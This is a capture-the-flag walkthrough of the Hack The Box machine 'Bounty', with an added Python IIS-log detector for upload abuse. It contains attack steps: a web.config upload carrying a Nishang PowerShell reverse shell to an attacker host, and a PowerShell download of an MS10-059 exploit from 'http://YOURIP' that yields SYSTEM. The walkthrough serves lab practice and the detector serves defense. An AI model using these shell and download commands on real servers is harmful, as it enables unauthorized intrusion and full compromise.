Again, we start with nmap -sC -sV -oA ./bounty 10.10.10.93
We have a box with ONLY a web port open. The site is a simple image (Merlin from Disney's The Sword in the Stone). Let's run DirBuster against it and see what we can find. Shortly after that starts running, it finds a "transfer.aspx" page. Let's check there.
It looks like a simple file upload page, and the "uploadedfiles" folder looks to be where they land. After much trial and error, I finally get a web.config file to upload successfully. A little bit of Google-Fu and we find
https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/. Let's see what we can come up with.
Invoke-PowerShell.ps1 came from https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
and I added Invoke-PowerShellTcp -Reverse -IPAddress YOURIP -Port 9999 to the very end.
Now just set a netcat listener and navigate to the web.config file you just uploaded. Boom! Instant user shell.
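From the defender's side, the upload-then-fetch sequence above leaves a clear trail in the IIS logs: a POST to the upload page followed by a GET of a server-side file (web.config, .aspx, etc.) from the uploads folder. The following is an added example, not part of this writeup, that scans W3C-format IIS log lines for that pattern; the log excerpt, client IPs and timestamps are constructed, and the upload folder path is assumed to be /uploadedfiles/ as described above.

```python
"""Flag the web.config-upload pattern in IIS W3C logs (constructed sample)."""
from collections import defaultdict

# Constructed IIS log excerpt; field order comes from the #Fields header.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2018-06-28 10:01:02 10.10.10.93 GET /transfer.aspx - 80 10.10.14.5 Mozilla/5.0 200
2018-06-28 10:01:09 10.10.10.93 POST /transfer.aspx - 80 10.10.14.5 Mozilla/5.0 200
2018-06-28 10:01:15 10.10.10.93 GET /uploadedfiles/web.config - 80 10.10.14.5 Mozilla/5.0 200
2018-06-28 10:02:40 10.10.10.93 GET /uploadedfiles/merlin.png - 80 10.10.14.9 Mozilla/5.0 200
"""

# Server-side config/script names that should never be served from an upload folder.
SUSPICIOUS_NAMES = {"web.config"}
SUSPICIOUS_EXTS = {".aspx", ".asp", ".ashx", ".asmx", ".config"}

def parse_iis(text):
    """Yield dict records from W3C-format IIS log text, honouring the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):
            yield dict(zip(fields, values))

def find_upload_abuse(text, upload_dir="/uploadedfiles/"):
    """Return (client_ip, uri) pairs for config/script files fetched from the upload
    folder by a client that had earlier POSTed to the site (i.e. uploaded something)."""
    posted = defaultdict(bool)   # c-ip -> has this client sent a POST yet?
    hits = []
    for rec in parse_iis(text):
        ip, uri = rec["c-ip"], rec["cs-uri-stem"].lower()
        if rec["cs-method"] == "POST":
            posted[ip] = True
        if uri.startswith(upload_dir):
            name = uri.rsplit("/", 1)[-1]
            ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
            if (name in SUSPICIOUS_NAMES or ext in SUSPICIOUS_EXTS) and posted[ip]:
                hits.append((ip, rec["cs-uri-stem"]))
    return hits

if __name__ == "__main__":
    for ip, uri in find_upload_abuse(SAMPLE_LOG):
        print(f"ALERT upload-folder execution candidate: {ip} fetched {uri}")
```

The same check run against a real log only works if the upload folder has execute permissions and "Allow overrides" left at IIS defaults; the hardening fix is to deny those on the uploads directory and to whitelist upload extensions server-side.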
For PrivEsc, run systeminfo. Output that to a file (my output is in the CTB). Feed that file to the Windows Exploit Suggester. You will get this output
If you have been following along alphabetically, Arctic also had the MS10-059 vulnerability. From the PowerShell window, you can run this to get the exe over to the target:
(new-object net.webclient).downloadfile('http://YOURIP/MS10-059.exe', '\users\merlin\appdata\local\temp\ex.exe')
From there, start a nc -lvnp listener on your machine and run the exe
.\ex.exe YOURIP PORT
Now you are NT AUTHORITY\SYSTEM. Use type instead of cat because this is a Windows box, and there are your flags.